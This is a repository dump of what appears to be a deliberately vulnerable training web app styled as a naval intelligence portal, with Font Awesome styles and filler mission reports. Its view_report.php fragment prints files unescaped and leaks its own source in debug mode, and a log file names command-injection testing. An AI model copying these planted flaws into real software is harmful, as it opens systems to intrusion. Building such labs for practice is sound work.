├── assets ├── style.css └── style-enhanced.css ├── logs └── dummy_report.txt ├── main.jpeg ├── static ├── fonts │ ├── FontAwesome.otf │ ├── fontawesome-webfont.eot │ ├── fontawesome-webfont.ttf │ ├── fontawesome-webfont.woff │ └── fontawesome-webfont.woff2 ├── less │ ├── screen-reader.less │ ├── fixed-width.less │ ├── larger.less │ ├── list.less │ ├── core.less │ ├── stacked.less │ ├── font-awesome.less │ ├── bordered-pulled.less │ ├── rotated-flipped.less │ ├── path.less │ ├── animated.less │ └── mixins.less ├── scss │ ├── _fixed-width.scss │ ├── _screen-reader.scss │ ├── _larger.scss │ ├── _list.scss │ ├── _core.scss │ ├── font-awesome.scss │ ├── _stacked.scss │ ├── _bordered-pulled.scss │ ├── _rotated-flipped.scss │ ├── _path.scss │ ├── _animated.scss │ └── _mixins.scss ├── css │ └── classification.css └── js │ ├── naval_operations.js │ └── flag_popup.js ├── mission_uploads ├── Snapchat-163660861.jpg ├── map_of_ghana_and_nigeria.png └── mission_report_2.txt ├── .gitignore ├── logout.php ├── index.php ├── components └── view_report.php ├── includes ├── config.php └── attack_detection.php ├── .htaccess ├── session.php ├── missions ├── mission_report_18.txt ├── mission_report_6.txt ├── mission_report_11.txt ├── mission_report_1.txt ├── mission_report_17.txt ├── mission_report_20.txt ├── mission_report_13.txt ├── mission_report_2.txt ├── mission_report_19.txt ├── mission_report_16.txt ├── mission_report_12.txt ├── mission_report_10.txt ├── mission_report_3.txt ├── mission_report_5.txt ├── mission_report_8.txt ├── mission_report_14.txt ├── mission_report_15.txt ├── mission_report_4.txt ├── mission_report_9.txt ├── mission_report_7.txt ├── intelligence_fetch.php ├── xxe_parser.php ├── poc.php ├── preferences.php └── voucher_redeem.php ├── LICENSE ├── Dockerfile ├── honeypot_trap.php ├── admin ├── log_viewer.php ├── emergency_access.php ├── backup_db.php ├── audit_trail.php ├── deployments.json ├── access_control.php └── view_all_officers.php ├── docker-compose.yml ├── log_flag.php ├── fake_dashboard.php ├── reset.sh ├── test_vulnerabilities.sh ├── secure_example ├── login_secure.php ├── README.md └── upload_secure.php ├── setup.sh ├── REPORT_TEMPLATE.md ├── view_profile.php ├── HINTS.md └── FLAGS.md /assets/style.css: -------------------------------------------------------------------------------- 1 | body { font-family: Arial; background: #f2f2f2; } -------------------------------------------------------------------------------- /logs/dummy_report.txt: -------------------------------------------------------------------------------- 1 | This is a dummy report file for testing command injection. 2 | -------------------------------------------------------------------------------- /main.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedHatPentester/HIVE_NAVAL_SYSTEM/HEAD/main.jpeg -------------------------------------------------------------------------------- /static/fonts/FontAwesome.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedHatPentester/HIVE_NAVAL_SYSTEM/HEAD/static/fonts/FontAwesome.otf -------------------------------------------------------------------------------- /static/fonts/fontawesome-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedHatPentester/HIVE_NAVAL_SYSTEM/HEAD/static/fonts/fontawesome-webfont.eot -------------------------------------------------------------------------------- /static/fonts/fontawesome-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedHatPentester/HIVE_NAVAL_SYSTEM/HEAD/static/fonts/fontawesome-webfont.ttf -------------------------------------------------------------------------------- /static/fonts/fontawesome-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedHatPentester/HIVE_NAVAL_SYSTEM/HEAD/static/fonts/fontawesome-webfont.woff -------------------------------------------------------------------------------- /mission_uploads/Snapchat-163660861.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedHatPentester/HIVE_NAVAL_SYSTEM/HEAD/mission_uploads/Snapchat-163660861.jpg -------------------------------------------------------------------------------- /static/fonts/fontawesome-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedHatPentester/HIVE_NAVAL_SYSTEM/HEAD/static/fonts/fontawesome-webfont.woff2 -------------------------------------------------------------------------------- /mission_uploads/map_of_ghana_and_nigeria.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedHatPentester/HIVE_NAVAL_SYSTEM/HEAD/mission_uploads/map_of_ghana_and_nigeria.png -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | *.log 3 | node_modules/ 4 | vendor/ 5 | .idea/ 6 | .vscode/ 7 | *.swp 8 | *.swo 9 | .env 10 | docker-compose.override.yml 11 | -------------------------------------------------------------------------------- /static/less/screen-reader.less: -------------------------------------------------------------------------------- 1 | // Screen Readers 2 | // ------------------------- 3 | 4 | .sr-only { .sr-only(); } 5 | .sr-only-focusable { .sr-only-focusable(); } 6 | -------------------------------------------------------------------------------- /static/less/fixed-width.less: -------------------------------------------------------------------------------- 1 | // Fixed Width Icons 2 | // ------------------------- 3 | .@{fa-css-prefix}-fw { 4 | width: (18em / 14); 5 | text-align: center; 6 | } 7 | -------------------------------------------------------------------------------- /static/scss/_fixed-width.scss: -------------------------------------------------------------------------------- 1 | // Fixed Width Icons 2 | // ------------------------- 3 | .#{$fa-css-prefix}-fw { 4 | width: (18em / 14); 5 | text-align: center; 6 | } 7 | -------------------------------------------------------------------------------- /static/scss/_screen-reader.scss: -------------------------------------------------------------------------------- 1 | // Screen Readers 2 | // ------------------------- 3 | 4 | .sr-only { @include sr-only(); } 5 | .sr-only-focusable { @include sr-only-focusable(); } 6 | -------------------------------------------------------------------------------- /logout.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /components/view_report.php: -------------------------------------------------------------------------------- 1 | Viewing: $file"; 8 | echo "
" . $content . "
"; 9 | 10 | // Debug mode with sensitive info leak 11 | if ($_GET['debug'] == 'true') { 12 | highlight_file(__FILE__); 13 | } 14 | ?> -------------------------------------------------------------------------------- /static/less/larger.less: -------------------------------------------------------------------------------- 1 | // Icon Sizes 2 | // ------------------------- 3 | 4 | /* makes the font 33% larger relative to the icon container */ 5 | .@{fa-css-prefix}-lg { 6 | font-size: (4em / 3); 7 | line-height: (3em / 4); 8 | vertical-align: -15%; 9 | } 10 | .@{fa-css-prefix}-2x { font-size: 2em; } 11 | .@{fa-css-prefix}-3x { font-size: 3em; } 12 | .@{fa-css-prefix}-4x { font-size: 4em; } 13 | .@{fa-css-prefix}-5x { font-size: 5em; } 14 | -------------------------------------------------------------------------------- /static/scss/_larger.scss: -------------------------------------------------------------------------------- 1 | // Icon Sizes 2 | // ------------------------- 3 | 4 | /* makes the font 33% larger relative to the icon container */ 5 | .#{$fa-css-prefix}-lg { 6 | font-size: (4em / 3); 7 | line-height: (3em / 4); 8 | vertical-align: -15%; 9 | } 10 | .#{$fa-css-prefix}-2x { font-size: 2em; } 11 | .#{$fa-css-prefix}-3x { font-size: 3em; } 12 | .#{$fa-css-prefix}-4x { font-size: 4em; } 13 | .#{$fa-css-prefix}-5x { font-size: 5em; } 14 | -------------------------------------------------------------------------------- /static/less/list.less: -------------------------------------------------------------------------------- 1 | // List Icons 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix}-ul { 5 | padding-left: 0; 6 | margin-left: @fa-li-width; 7 | list-style-type: none; 8 | > li { position: relative; } 9 | } 10 | .@{fa-css-prefix}-li { 11 | position: absolute; 12 | left: -@fa-li-width; 13 | width: @fa-li-width; 14 | top: (2em / 14); 15 | text-align: center; 16 | &.@{fa-css-prefix}-lg { 17 | left: (-@fa-li-width + (4em / 14)); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /static/scss/_list.scss: -------------------------------------------------------------------------------- 1 | // List Icons 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix}-ul { 5 | padding-left: 0; 6 | margin-left: $fa-li-width; 7 | list-style-type: none; 8 | > li { position: relative; } 9 | } 10 | .#{$fa-css-prefix}-li { 11 | position: absolute; 12 | left: -$fa-li-width; 13 | width: $fa-li-width; 14 | top: (2em / 14); 15 | text-align: center; 16 | &.#{$fa-css-prefix}-lg { 17 | left: -$fa-li-width + (4em / 14); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /static/less/core.less: -------------------------------------------------------------------------------- 1 | // Base Class Definition 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix} { 5 | display: inline-block; 6 | font: normal normal normal @fa-font-size-base/@fa-line-height-base FontAwesome; // shortening font declaration 7 | font-size: inherit; // can't have font-size inherit on line above, so need to override 8 | text-rendering: auto; // optimizelegibility throws things off #1094 9 | -webkit-font-smoothing: antialiased; 10 | -moz-osx-font-smoothing: grayscale; 11 | 12 | } 13 | -------------------------------------------------------------------------------- /static/scss/_core.scss: -------------------------------------------------------------------------------- 1 | // Base Class Definition 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix} { 5 | display: inline-block; 6 | font: normal normal normal #{$fa-font-size-base}/#{$fa-line-height-base} FontAwesome; // shortening font declaration 7 | font-size: inherit; // can't have font-size inherit on line above, so need to override 8 | text-rendering: auto; // optimizelegibility throws things off #1094 9 | -webkit-font-smoothing: antialiased; 10 | -moz-osx-font-smoothing: grayscale; 11 | 12 | } 13 | -------------------------------------------------------------------------------- /static/scss/font-awesome.scss: -------------------------------------------------------------------------------- 1 | /*! 2 | * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome 3 | * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) 4 | */ 5 | 6 | @import "variables"; 7 | @import "mixins"; 8 | @import "path"; 9 | @import "core"; 10 | @import "larger"; 11 | @import "fixed-width"; 12 | @import "list"; 13 | @import "bordered-pulled"; 14 | @import "animated"; 15 | @import "rotated-flipped"; 16 | @import "stacked"; 17 | @import "icons"; 18 | @import "screen-reader"; 19 | -------------------------------------------------------------------------------- /static/less/stacked.less: -------------------------------------------------------------------------------- 1 | // Stacked Icons 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix}-stack { 5 | position: relative; 6 | display: inline-block; 7 | width: 2em; 8 | height: 2em; 9 | line-height: 2em; 10 | vertical-align: middle; 11 | } 12 | .@{fa-css-prefix}-stack-1x, .@{fa-css-prefix}-stack-2x { 13 | position: absolute; 14 | left: 0; 15 | width: 100%; 16 | text-align: center; 17 | } 18 | .@{fa-css-prefix}-stack-1x { line-height: inherit; } 19 | .@{fa-css-prefix}-stack-2x { font-size: 2em; } 20 | .@{fa-css-prefix}-inverse { color: @fa-inverse; } 21 | -------------------------------------------------------------------------------- /static/scss/_stacked.scss: -------------------------------------------------------------------------------- 1 | // Stacked Icons 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix}-stack { 5 | position: relative; 6 | display: inline-block; 7 | width: 2em; 8 | height: 2em; 9 | line-height: 2em; 10 | vertical-align: middle; 11 | } 12 | .#{$fa-css-prefix}-stack-1x, .#{$fa-css-prefix}-stack-2x { 13 | position: absolute; 14 | left: 0; 15 | width: 100%; 16 | text-align: center; 17 | } 18 | .#{$fa-css-prefix}-stack-1x { line-height: inherit; } 19 | .#{$fa-css-prefix}-stack-2x { font-size: 2em; } 20 | .#{$fa-css-prefix}-inverse { color: $fa-inverse; } 21 | -------------------------------------------------------------------------------- /static/less/font-awesome.less: -------------------------------------------------------------------------------- 1 | /*! 2 | * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome 3 | * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) 4 | */ 5 | 6 | @import "variables.less"; 7 | @import "mixins.less"; 8 | @import "path.less"; 9 | @import "core.less"; 10 | @import "larger.less"; 11 | @import "fixed-width.less"; 12 | @import "list.less"; 13 | @import "bordered-pulled.less"; 14 | @import "animated.less"; 15 | @import "rotated-flipped.less"; 16 | @import "stacked.less"; 17 | @import "icons.less"; 18 | @import "screen-reader.less"; 19 | -------------------------------------------------------------------------------- /includes/config.php: -------------------------------------------------------------------------------- 1 | 22 | -------------------------------------------------------------------------------- /.htaccess: -------------------------------------------------------------------------------- 1 | # Font MIME types 2 | AddType application/vnd.ms-fontobject .eot 3 | AddType application/x-font-ttf .ttf 4 | AddType application/font-woff .woff 5 | AddType application/font-woff2 .woff2 6 | AddType image/svg+xml .svg 7 | AddType application/x-font-otf .otf 8 | 9 | # Security headers 10 | 11 | Header set X-Content-Type-Options "nosniff" 12 | Header set X-XSS-Protection "1; mode=block" 13 | 14 | 15 | # Disable directory listing 16 | Options -Indexes 17 | 18 | # Secure PHP files 19 | 20 | SetHandler application/x-httpd-php 21 | 22 | -------------------------------------------------------------------------------- /static/less/bordered-pulled.less: -------------------------------------------------------------------------------- 1 | // Bordered & Pulled 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix}-border { 5 | padding: .2em .25em .15em; 6 | border: solid .08em @fa-border-color; 7 | border-radius: .1em; 8 | } 9 | 10 | .@{fa-css-prefix}-pull-left { float: left; } 11 | .@{fa-css-prefix}-pull-right { float: right; } 12 | 13 | .@{fa-css-prefix} { 14 | &.@{fa-css-prefix}-pull-left { margin-right: .3em; } 15 | &.@{fa-css-prefix}-pull-right { margin-left: .3em; } 16 | } 17 | 18 | /* Deprecated as of 4.4.0 */ 19 | .pull-right { float: right; } 20 | .pull-left { float: left; } 21 | 22 | .@{fa-css-prefix} { 23 | &.pull-left { margin-right: .3em; } 24 | &.pull-right { margin-left: .3em; } 25 | } 26 | -------------------------------------------------------------------------------- /static/scss/_bordered-pulled.scss: -------------------------------------------------------------------------------- 1 | // Bordered & Pulled 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix}-border { 5 | padding: .2em .25em .15em; 6 | border: solid .08em $fa-border-color; 7 | border-radius: .1em; 8 | } 9 | 10 | .#{$fa-css-prefix}-pull-left { float: left; } 11 | .#{$fa-css-prefix}-pull-right { float: right; } 12 | 13 | .#{$fa-css-prefix} { 14 | &.#{$fa-css-prefix}-pull-left { margin-right: .3em; } 15 | &.#{$fa-css-prefix}-pull-right { margin-left: .3em; } 16 | } 17 | 18 | /* Deprecated as of 4.4.0 */ 19 | .pull-right { float: right; } 20 | .pull-left { float: left; } 21 | 22 | .#{$fa-css-prefix} { 23 | &.pull-left { margin-right: .3em; } 24 | &.pull-right { margin-left: .3em; } 25 | } 26 | -------------------------------------------------------------------------------- /static/less/rotated-flipped.less: -------------------------------------------------------------------------------- 1 | // Rotated & Flipped Icons 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix}-rotate-90 { .fa-icon-rotate(90deg, 1); } 5 | .@{fa-css-prefix}-rotate-180 { .fa-icon-rotate(180deg, 2); } 6 | .@{fa-css-prefix}-rotate-270 { .fa-icon-rotate(270deg, 3); } 7 | 8 | .@{fa-css-prefix}-flip-horizontal { .fa-icon-flip(-1, 1, 0); } 9 | .@{fa-css-prefix}-flip-vertical { .fa-icon-flip(1, -1, 2); } 10 | 11 | // Hook for IE8-9 12 | // ------------------------- 13 | 14 | :root .@{fa-css-prefix}-rotate-90, 15 | :root .@{fa-css-prefix}-rotate-180, 16 | :root .@{fa-css-prefix}-rotate-270, 17 | :root .@{fa-css-prefix}-flip-horizontal, 18 | :root .@{fa-css-prefix}-flip-vertical { 19 | filter: none; 20 | } 21 | -------------------------------------------------------------------------------- /session.php: -------------------------------------------------------------------------------- 1 | 24 | -------------------------------------------------------------------------------- /static/scss/_rotated-flipped.scss: -------------------------------------------------------------------------------- 1 | // Rotated & Flipped Icons 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix}-rotate-90 { @include fa-icon-rotate(90deg, 1); } 5 | .#{$fa-css-prefix}-rotate-180 { @include fa-icon-rotate(180deg, 2); } 6 | .#{$fa-css-prefix}-rotate-270 { @include fa-icon-rotate(270deg, 3); } 7 | 8 | .#{$fa-css-prefix}-flip-horizontal { @include fa-icon-flip(-1, 1, 0); } 9 | .#{$fa-css-prefix}-flip-vertical { @include fa-icon-flip(1, -1, 2); } 10 | 11 | // Hook for IE8-9 12 | // ------------------------- 13 | 14 | :root .#{$fa-css-prefix}-rotate-90, 15 | :root .#{$fa-css-prefix}-rotate-180, 16 | :root .#{$fa-css-prefix}-rotate-270, 17 | :root .#{$fa-css-prefix}-flip-horizontal, 18 | :root .#{$fa-css-prefix}-flip-vertical { 19 | filter: none; 20 | } 21 | -------------------------------------------------------------------------------- /missions/mission_report_18.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #18 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Re-Contextualize Seamless Architectures 9 | - Objective: Secured local initiative 10 | - Location: Reginaville, Venezuela 11 | - Start Time: 2025-03-11 15:12:10 12 | - End Time: 2025-03-11 08:55:53 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Trouble brother book appear military. Large stand little group. Suffer born prove treat raise move program. 17 | 18 | Submitted by: Alvin Sullivan 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_6.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #6 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Incubate Frictionless Channels 9 | - Objective: Digitized bifurcated structure 10 | - Location: Arnoldburgh, Saint Barthelemy 11 | - Start Time: 2025-01-15 06:17:09 12 | - End Time: 2025-01-29 04:15:17 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Trial tend customer mean walk including world. General study event enough. Trip million few usually among science. 17 | 18 | Submitted by: Kevin Beltran DVM 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_11.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #11 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Visualize Synergistic E-Services 9 | - Objective: Cloned client-server conglomeration 10 | - Location: Anthonymouth, Tajikistan 11 | - Start Time: 2025-03-11 09:32:47 12 | - End Time: 2025-03-14 23:18:24 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Before church after water worker authority growth. Pay coach of think management believe deep. Should yourself do word. 17 | 18 | Submitted by: Crystal Holmes 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_1.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #1 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Exploit Frictionless Relationships 9 | - Objective: Reverse-engineered 24hour capacity 10 | - Location: Port John, Czech Republic 11 | - Start Time: 2025-02-26 13:31:49 12 | - End Time: 2025-01-17 00:30:43 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Option environment public off same poor. They knowledge middle once economic. Hot return although tough operation security year. 17 | 18 | Submitted by: David Mills 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_17.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #17 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Extend Vertical Initiatives 9 | - Objective: Persevering foreground data-warehouse 10 | - Location: East Kimberly, Iceland 11 | - Start Time: 2025-01-14 18:56:28 12 | - End Time: 2025-02-24 01:33:48 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Give response raise PM factor say. Appear arm ready answer most question significant. Peace contain democratic yourself network next. 17 | 18 | Submitted by: Michael Mccoy 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_20.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #20 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Maximize Value-Added Applications 9 | - Objective: Mandatory optimal array 10 | - Location: Port Michaelside, Syrian Arab Republic 11 | - Start Time: 2025-01-16 20:22:59 12 | - End Time: 2025-02-05 16:25:15 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Wonder environment final church will. Change stage campaign tree new ground degree. Media piece democratic there continue appear public. 17 | 18 | Submitted by: Regina Smith 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_13.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #13 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Benchmark User-Centric Content 9 | - Objective: Re-engineered asymmetric Local Area Network 10 | - Location: Georgeview, France 11 | - Start Time: 2025-01-19 17:32:47 12 | - End Time: 2025-01-10 16:39:11 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Situation piece figure senior indeed keep four. Trade class great avoid smile. Piece society campaign range world those everyone. Goal on include same. 17 | 18 | Submitted by: Sharon Harmon 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_2.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #2 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Re-Contextualize Wireless Initiatives 9 | - Objective: Visionary coherent intranet 10 | - Location: Christineside, Gambia 11 | - Start Time: 2025-01-22 00:06:25 12 | - End Time: 2025-01-11 23:07:57 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Affect office change worker sing better across. Good I artist film democratic watch. Last student us voice memory. Clear style check defense site yard director. 17 | 18 | Submitted by: Tiffany Davies 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_19.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #19 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Enable Proactive Communities 9 | - Objective: Horizontal interactive Graphical User Interface 10 | - Location: East Mary, Liberia 11 | - Start Time: 2025-02-21 22:19:08 12 | - End Time: 2025-01-10 15:33:35 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Mr action nothing avoid door level cover. Every your action important station. List four image official. Those approach training west maintain summer. 17 | 18 | Submitted by: Michael Alvarez 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /static/less/path.less: -------------------------------------------------------------------------------- 1 | /* FONT PATH 2 | * -------------------------- */ 3 | 4 | @font-face { 5 | font-family: 'FontAwesome'; 6 | src: url('@{fa-font-path}/fontawesome-webfont.eot?v=@{fa-version}'); 7 | src: url('@{fa-font-path}/fontawesome-webfont.eot?#iefix&v=@{fa-version}') format('embedded-opentype'), 8 | url('@{fa-font-path}/fontawesome-webfont.woff2?v=@{fa-version}') format('woff2'), 9 | url('@{fa-font-path}/fontawesome-webfont.woff?v=@{fa-version}') format('woff'), 10 | url('@{fa-font-path}/fontawesome-webfont.ttf?v=@{fa-version}') format('truetype'), 11 | url('@{fa-font-path}/fontawesome-webfont.svg?v=@{fa-version}#fontawesomeregular') format('svg'); 12 | // src: url('@{fa-font-path}/FontAwesome.otf') format('opentype'); // used when developing fonts 13 | font-weight: normal; 14 | font-style: normal; 15 | } 16 | -------------------------------------------------------------------------------- /mission_uploads/mission_report_2.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #2 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Re-Contextualize Wireless Initiatives 9 | - Objective: Visionary coherent intranet 10 | - Location: Christineside, Gambia 11 | - Start Time: 2025-01-22 00:06:25 12 | - End Time: 2025-01-11 23:07:57 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Affect office change worker sing better across. Good I artist film democratic watch. Last student us voice memory. Clear style check defense site yard director. 17 | 18 | Submitted by: Tiffany Davies 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_16.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #16 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Incentivize Killer Synergies 9 | - Objective: Team-oriented bi-directional product 10 | - Location: Patrickton, Andorra 11 | - Start Time: 2025-01-30 00:42:49 12 | - End Time: 2025-01-25 15:37:06 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Bag family husband issue consider available response. Ago leg coach news himself despite. Situation meeting election sense. Most long phone best political stay less small. 17 | 18 | Submitted by: James Nichols 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /static/scss/_path.scss: -------------------------------------------------------------------------------- 1 | /* FONT PATH 2 | * -------------------------- */ 3 | 4 | @font-face { 5 | font-family: 'FontAwesome'; 6 | src: url('#{$fa-font-path}/fontawesome-webfont.eot?v=#{$fa-version}'); 7 | src: url('#{$fa-font-path}/fontawesome-webfont.eot?#iefix&v=#{$fa-version}') format('embedded-opentype'), 8 | url('#{$fa-font-path}/fontawesome-webfont.woff2?v=#{$fa-version}') format('woff2'), 9 | url('#{$fa-font-path}/fontawesome-webfont.woff?v=#{$fa-version}') format('woff'), 10 | url('#{$fa-font-path}/fontawesome-webfont.ttf?v=#{$fa-version}') format('truetype'), 11 | url('#{$fa-font-path}/fontawesome-webfont.svg?v=#{$fa-version}#fontawesomeregular') format('svg'); 12 | // src: url('#{$fa-font-path}/FontAwesome.otf') format('opentype'); // used when developing fonts 13 | font-weight: normal; 14 | font-style: normal; 15 | } 16 | -------------------------------------------------------------------------------- /missions/mission_report_12.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #12 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Evolve Holistic Markets 9 | - Objective: Ameliorated fault-tolerant complexity 10 | - Location: West Christopherhaven, Lebanon 11 | - Start Time: 2025-03-10 11:42:51 12 | - End Time: 2025-02-12 23:36:54 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Box exactly fine head law summer church clear. Chance score hope success. Game may worry type success memory born save. Particularly able appear energy discussion professor even. 17 | 18 | Submitted by: Ronald Chang 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_10.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #10 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Target Granular Bandwidth 9 | - Objective: Integrated even-keeled framework 10 | - Location: Kayleemouth, Congo 11 | - Start Time: 2025-02-11 09:16:53 12 | - End Time: 2025-02-25 10:23:14 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Type weight share serve professional consumer than. Figure government agent school season. Popular event strategy call writer glass true. Similar south only protect white pay during. Draw soon always again. 17 | 18 | Submitted by: Erika Larsen 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_3.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #3 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Drive Synergistic Infrastructures 9 | - Objective: Monitored national hub 10 | - Location: Allenborough, Saudi Arabia 11 | - Start Time: 2025-03-22 14:11:43 12 | - End Time: 2025-01-17 08:04:44 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Thought bag score but. Bring experience say moment inside writer pass. Throw reality military idea allow party. Rich moment turn tell politics beyond. Finish bill real within. Leader do former floor war dinner. 17 | 18 | Submitted by: Brian Parsons 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_5.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #5 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Incentivize B2B Roi 9 | - Objective: Future-proofed directional model 10 | - Location: Wilsonborough, Mayotte 11 | - Start Time: 2025-01-15 20:28:08 12 | - End Time: 2025-03-28 20:42:09 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Yard first police then business population manage break. Moment in weight stuff music seven care season. Hour shake share four like recent each. Entire similar peace father few road. South finally turn fish time any not. 17 | 18 | Submitted by: Kimberly Nixon 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_8.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #8 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Transition World-Class Architectures 9 | - Objective: Compatible disintermediate challenge 10 | - Location: North Carlosmouth, Saint Vincent and the Grenadines 11 | - Start Time: 2025-02-13 14:36:03 12 | - End Time: 2025-03-11 15:58:49 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Better modern teach mouth science. Significant along lot cost stop how. Number experience wife protect employee effort compare. Light practice truth. Difficult raise goal. 17 | 18 | 